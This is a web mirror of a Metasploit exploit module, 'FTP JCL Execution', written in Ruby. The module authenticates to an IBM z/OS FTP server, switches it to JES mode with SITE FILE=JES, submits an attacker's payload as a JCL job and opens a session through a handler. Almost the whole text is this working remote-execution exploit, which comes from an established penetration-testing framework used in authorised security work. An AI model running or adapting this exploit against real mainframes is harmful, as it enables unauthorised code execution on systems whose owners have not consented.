CoCalc -- ftp_jcl

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb
¹⁹⁵⁰⁰ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Ftp
10
  include Msf::Exploit::Remote::Tcp
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'FTP JCL Execution',
17
        'Description' => %q{
18
          Submit JCL to z/OS via FTP and SITE FILE=JES.
19
          This exploit requires valid credentials on the target system.
20
        },
21
        'Author' => [
22
          'Bigendian Smalls',
23
          'mainframed a.k.a. soldier of fortran',
24
          'S&Oxballs a.k.a. chiefascot'
25
        ],
26
        'Arch' => ARCH_CMD,
27
        'License' => MSF_LICENSE,
28
        'Platform' => ['mainframe'],
29
        'Privileged' => false,
30
        'Targets' => [['Automatic', {}]],
31
        'DisclosureDate' => '2013-05-12',
32
        'DisableNops' => true,
33
        'DefaultTarget' => 0,
34
        'Notes' => {
35
          'Stability' => [CRASH_SAFE],
36
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
37
          'Reliability' => [REPEATABLE_SESSION]
38
        }
39
      )
40
    )
41

42
    register_options(
43
      [
44
        Opt::RPORT(21),
45
        OptInt.new('SLEEP', [ false, 'Time to wait before checking if job has completed.', 5 ])
46
      ]
47
    )
48
  end
49

50
  def post_auth?
51
    true
52
  end
53

54
  def check
55
    ##
56
    # Connect to get the FTP banner and check target OS
57
    ##
58
    fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server") unless connect_login
59

60
    print_good('Successfully connected to FTP server.')
61
    test_jes = send_cmd(['site', 'file=jes'])
62

63
    # Disconnect and check cached self.banner
64
    disconnect
65

66
    ##
67
    # Check if the target system has an FTP server running on z/OS"
68
    ##
69
    unless banner =~ /IBM FTP CS V.R./
70
      return CheckCode::Safe("We could not recognize the server banner: #{banner.strip}")
71
    end
72

73
    if test_jes =~ /200 SITE/
74
      return CheckCode::Vulnerable('Found IBM z/OS Banner and JES commands accepted')
75
    end
76

77
    CheckCode::Detected('Found IBM z/OS Banner but SITE FILE=JES failed. Try anyway!')
78
  end
79

80
  ##
81
  # Exploit the target system by submitting a JCL job via FTP
82
  ##
83
  def exploit
84
    fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to connect to FTP server") unless connect_login
85

86
    print_good('Successfully connected to FTP server.')
87

88
    send_cmd(['site', 'file=jes'])
89
    print_good('Successfully switched to JES mode')
90

91
    jcl_file_name = Rex::Text.rand_text_alpha_upper(8)
92
    print_status("Uploading JCL file: #{jcl_file_name}")
93

94
    res = send_cmd_data(['put', jcl_file_name], payload.encoded)
95
    if res.nil?
96
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} - Failed to upload JCL to FTP server")
97
    end
98

99
    job_num = res.lines.first.split.last
100
    print_good("Job Submitted. Job number is #{job_num}")
101

102
    handler
103
    disconnect
104
  end
105
end
106

107
Product

Resources

Company
